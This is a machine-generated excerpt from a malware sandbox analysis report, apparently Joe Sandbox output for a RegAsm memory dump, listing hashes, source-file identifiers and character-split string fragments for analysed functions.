                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6519A755083409BD3009B14E855A1FFFF4EF8A398F18492DF988A3662D339DA84CB4B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: b034a7fb5ec529ca2b298cf9da4ade5fbb74b66bba5adfb60a3e47a5e451fc83
                                                                                                                                                                                                                                                                                      • Instruction ID: 25495bc7638c44b9a74d580e0d1f799b5547a60435eb20c05cae6dd78fc0e6d1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b034a7fb5ec529ca2b298cf9da4ade5fbb74b66bba5adfb60a3e47a5e451fc83
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9941B831519240DFD305DF29D84061BBBF1EB8A319F1A882DE0C9DB252D33AD9A0DB66
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 5b4919542db87ef15d6501111e9a02519976f5749f20038bb409db5e85e4068e
                                                                                                                                                                                                                                                                                      • Instruction ID: e2af447293074ac8e00bce03f516743f7dc143240018747b360e2c89c8b06420
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b4919542db87ef15d6501111e9a02519976f5749f20038bb409db5e85e4068e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D41AE34648300ABF7149F14D881B2FBBA5EF85B15F64882EF98597391D339E820DB5B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 3169929994634ef2077c041faa95f0d832da6bd7ba7a3821c27d134a5aacb742
                                                                                                                                                                                                                                                                                      • Instruction ID: 47728a669c79b475a8708ef9ef7051f75b15f44249d92193e3c2d03c398b1a90
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3169929994634ef2077c041faa95f0d832da6bd7ba7a3821c27d134a5aacb742
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33419F34648300ABE714DF14D884B2FB7A5EF85B15F24882DF58997292D379EC20CB5B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 9183fdbd3bc781a0cb88e6bbac204078416eddb5940c36d85a7f1c5a33c86aca
                                                                                                                                                                                                                                                                                      • Instruction ID: 8255f2692f2ee1c346309be52bc8f90fab5081857ffff02f8e6f1e128a14f900
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9183fdbd3bc781a0cb88e6bbac204078416eddb5940c36d85a7f1c5a33c86aca
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 482129329092144BC724EB2AC5C153BF7E4FB9A705F06E62EE4C5972D4E3389C14D7A9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: f7f15e7b5b08b8358fbe17d37fc05187be34d42391d0b42d671e7a7b1351e9ae
                                                                                                                                                                                                                                                                                      • Instruction ID: a0a38374a5d415bcb8d307490c767129dc0b5c15cdc5ff0a37d04932c2cbf940
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7f15e7b5b08b8358fbe17d37fc05187be34d42391d0b42d671e7a7b1351e9ae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B217C71908711CBC7188F18C5806AAF3E6AFD6311F590D2EE485A73A1E379ACC4875A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: e79c3b45624a882f934ee024146479d1825bddb21ba4f7db3b27565651f84d4f
                                                                                                                                                                                                                                                                                      • Instruction ID: 7938f4f8e34c94a93a6c7bd32fdfd3ad56508eba67062ea661191e625ca0c264
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e79c3b45624a882f934ee024146479d1825bddb21ba4f7db3b27565651f84d4f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC119035B48702CFD71C9F28E89272977E7AB4A352F08947CE545C7792DB39E5208B08
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                                      • Instruction ID: 7d10e2c15ea9f06a0d4e2522de07e23b66c0f3f0d0fd9a9783381ead211a51e2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7112533A441D40EC3168D3C8400566BFA30EA7234F19939AF4F99B2D6D62A8D8F935A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 28ad19d8cfbfb0cb222b253004665edd99a68b1ff040e71c4b0f1f212e980fae
                                                                                                                                                                                                                                                                                      • Instruction ID: ab7febcd0eca08795d5a60d133958692f379e80827238efd201f6571f06bde72
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28ad19d8cfbfb0cb222b253004665edd99a68b1ff040e71c4b0f1f212e980fae
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1601B5F160030187D720AF15A4E172BB2B86F98708F08563EDD059B342DB79EC04C2A9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 03a19ea9a61bcbf485f93a74945de64ecec93f8d99b167e348884a198c2cef38
                                                                                                                                                                                                                                                                                      • Instruction ID: a48b3a49b16eb98fff5351c0ae707fdd69bc2130594045881b816d9b28089cb8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03a19ea9a61bcbf485f93a74945de64ecec93f8d99b167e348884a198c2cef38
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B11363050C280DBE301EF18D984A1EFBF1AB96705F588C5EE8C597212C33AD852DB6B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 94b0bc6cc3fdd4b167a1ee70d265d0f9124672522aacad7ac7bde586668fd040
                                                                                                                                                                                                                                                                                      • Instruction ID: 8423abf369b7f4585581180127d292fc7783a6ad308813f97001047fee25610c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94b0bc6cc3fdd4b167a1ee70d265d0f9124672522aacad7ac7bde586668fd040
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EF05937B2A22607E710CDAAACC0437B766D7C6224B1D4039E844EB380C438F80692A9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 6513af987a43e4a7ac2c38aef8240bb607edcb564965723d3a7569e5c4607175
                                                                                                                                                                                                                                                                                      • Instruction ID: e9e47f4146c7d320ad63e10ef5e29b7122aebb1afa00044be253a7fa34d3bcf7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6513af987a43e4a7ac2c38aef8240bb607edcb564965723d3a7569e5c4607175
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9F01DB15083408BD2009B15E891A6FFFF0EB8E398F184D1EF6C5A7662D335C985DB5A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                                                                                                                                      • Instruction ID: c7730519640079c8f3abb85b27392490dc40cc71ea1b4e4eab268d93c1a90179
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBD0A721A0833146AB748F19E801977F7F0EACBB12F49955FF682E3258D234DC81C2AD
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocString
                                                                                                                                                                                                                                                                                      • String ID: $!$#$%$'$($)$+$-$/$0$1$1$2$3$5$7$9$;$;$<$=$?$@$C$D$E$F$G$G$G$G$I$K$M$M$O$O$P$Q$R$Y$Y$[$\$]$^$_$_$a$c$f$g$n$u$v$y
                                                                                                                                                                                                                                                                                      • API String ID: 2525500382-1333701383
                                                                                                                                                                                                                                                                                      • Opcode ID: 73e2f76e5052510aa96f3737bd69ad55c3d373dbbd7b5c3d34702fcebabff742
                                                                                                                                                                                                                                                                                      • Instruction ID: 3b7627a599f92b1b78fb9dcd785168af23d865a9a461181fbf75d5fb47b6088a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73e2f76e5052510aa96f3737bd69ad55c3d373dbbd7b5c3d34702fcebabff742
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D791856000C7C0CEE362DB69804875FFFE16BA6308F48599DE5D84B392C3BA9549CB67
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocString
                                                                                                                                                                                                                                                                                      • String ID: $!$#$%$'$($)$+$-$/$0$1$1$2$3$5$7$9$;$;$<$=$?$@$C$D$E$F$G$G$G$G$I$K$M$M$O$O$P$Q$R$Y$Y$[$\$]$^$_$_$a$c$f$g$n$u$v$y
                                                                                                                                                                                                                                                                                      • API String ID: 2525500382-1333701383
                                                                                                                                                                                                                                                                                      • Opcode ID: 285531bc14d198212ef6618e641bb56c9b5f982aa919e70827f6043f9da7f6f2
                                                                                                                                                                                                                                                                                      • Instruction ID: 344b48f3bc2d156e5afcc09d0d10fe2599dc64e26b5772b0c3e0c4dcf4ef7e46
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 285531bc14d198212ef6618e641bb56c9b5f982aa919e70827f6043f9da7f6f2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3091736000D7C0CEE362D768948875FFFE16BA6308F48599DE1D84B392C7BA8549CB67
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AllocString
                                                                                                                                                                                                                                                                                      • String ID: !$#$%$'$)$+$-$.$/$0$1$3$5$7$9$;$=$?$K$^
                                                                                                                                                                                                                                                                                      • API String ID: 2525500382-2333071540
                                                                                                                                                                                                                                                                                      • Opcode ID: 994905c787983a3272438dc457c5ae7452f4e5802e0ab39f33408f2a95439f26
                                                                                                                                                                                                                                                                                      • Instruction ID: 16ac030045fc967b582465ee67571b60ff6ee4801b5cb05631366cea60bb4ca4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 994905c787983a3272438dc457c5ae7452f4e5802e0ab39f33408f2a95439f26
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1091826010C7C18ED332DB3C944879BBEE16BA7224F184A9DE1E94B3E2C7758545DB63
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                      • String ID: A$C$E$G$I$K$m$n$o$q$s$u$w$y${$}
                                                                                                                                                                                                                                                                                      • API String ID: 2610073882-2409066515
                                                                                                                                                                                                                                                                                      • Opcode ID: d6805ed50e0363ad7a2ef3ec6477cf94652ff39ec70852b854c967d1a7775de3
                                                                                                                                                                                                                                                                                      • Instruction ID: 7bf79194c8c24805810e3aeca6596ecd3e4f2638325ea3726b0b43c53579de08
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6805ed50e0363ad7a2ef3ec6477cf94652ff39ec70852b854c967d1a7775de3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8851F27040C7C18ED3369B2894887DFBFE06BA6324F080A9ED4E94A2D2C7795655CB67
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                      • String ID: I$J$K$Q$S$U$W$Y$[$]$_$a$c$e$g
                                                                                                                                                                                                                                                                                      • API String ID: 2610073882-963577826
                                                                                                                                                                                                                                                                                      • Opcode ID: f8e221225a89f4b418e569a730b8c5c8c09078942a03eed43b98ab6f92318543
                                                                                                                                                                                                                                                                                      • Instruction ID: 24de7715a7e815ececcb8a69f24841434266c04571df73139c4de989db1e9ad9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8e221225a89f4b418e569a730b8c5c8c09078942a03eed43b98ab6f92318543
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D251927010DBC1CAE3329B289858BDBBFE0AB96315F044A5DD4ED4B392C7755145CB63
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                      • String ID: Q$S$U$V$W$Y$[$]$_$a$c$e$g
                                                                                                                                                                                                                                                                                      • API String ID: 2610073882-336139966
                                                                                                                                                                                                                                                                                      • Opcode ID: 5b090968d082e3a2a9d57865fb7dc28a1b7ab2127675d3d44d69edb3a6f739de
                                                                                                                                                                                                                                                                                      • Instruction ID: 43e50af9f827047fd5d4fbc76106e65e8411c7df833441b399d0e36388c7444d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b090968d082e3a2a9d57865fb7dc28a1b7ab2127675d3d44d69edb3a6f739de
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2241C27000C7C19AD361DB28948865BBFE0AB96328F581A8DF4E94B3D2C7B58549CB67
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitVariant
                                                                                                                                                                                                                                                                                      • String ID: !$&$($,$0$5$7$8$8$?$?
                                                                                                                                                                                                                                                                                      • API String ID: 1927566239-122970479
                                                                                                                                                                                                                                                                                      • Opcode ID: 2144cf2168d2b0ed8eaa18ed24196d0cce2c0cd9b561ec7af190c504a4376857
                                                                                                                                                                                                                                                                                      • Instruction ID: 3101ee6f2ca1d6e00e85825a363c634485ce8afe5547d6bf6cb07f3fb076ff55
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2144cf2168d2b0ed8eaa18ed24196d0cce2c0cd9b561ec7af190c504a4376857
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D51C37010C7C58ED3369B6884597DEBFE0ABA6324F044A5DE4E84B392C7B44245CB97
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000002F.00000002.1496919109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_47_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                      • String ID: '$/$1$3$4$5$7$:$?
                                                                                                                                                                                                                                                                                      • API String ID: 2610073882-1513513
                                                                                                                                                                                                                                                                                      • Opcode ID: 79ac5d718077e517ffa019e0bd1c545987a4b606cc25d6d2c8915d58d9a70e69
                                                                                                                                                                                                                                                                                      • Instruction ID: 5f141e84e379873111f12f424d1d02522e7e042dc41bba398aecbbf36926189d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79ac5d718077e517ffa019e0bd1c545987a4b606cc25d6d2c8915d58d9a70e69
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7841C67010C7C28ED3329B689448BDEBFE0ABA6324F048E6ED4E947792D7745185DB23